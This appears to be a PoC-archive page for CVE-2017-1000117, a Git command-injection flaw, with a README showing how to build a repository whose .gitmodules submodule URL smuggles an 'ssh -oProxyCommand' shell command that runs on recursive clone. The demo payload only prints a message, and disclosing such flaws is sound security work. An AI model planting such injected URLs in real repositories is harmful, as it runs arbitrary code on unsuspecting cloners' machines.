Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2017-1000117 PoC — Git 命令注入漏洞

Source
https://github.com/ikmski/CVE-2017-1000117
Associated Vulnerability
Title:Git 命令注入漏洞 (CVE-2017-1000117)
Description:A malicious third-party can give a crafted "ssh://..." URL to an unsuspecting victim, and an attempt to visit the URL can result in any program that exists on the victim's machine being executed. Such a URL could be placed in the .gitmodules file of a malicious project, and an unsuspecting victim could be tricked into running "git clone --recurse-submodules" to trigger the vulnerability.
Readme
# CVE-2017-1000117

## How it works?
```
$ git clone --recursive git@github.com:ikmski/CVE-2017-1000117.git
```

## How to create this repository

```
$ cat message.txt | gzip | base64 > command


$ git submodule add git@github.com:ikmski/Hello-World.git subs/CVE-2017-1000117

$ cat << EOS > .gitmodules
[submodule "subs/CVE-2017-1000117"]
    path = subs/CVE-2017-1000117
    url = ssh://-oProxyCommand=cat command | base64 --decode | gzip -d >&2 /subs/CVE-2017-1000117
EOS

$ git submodule sync
$ git submodule update
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →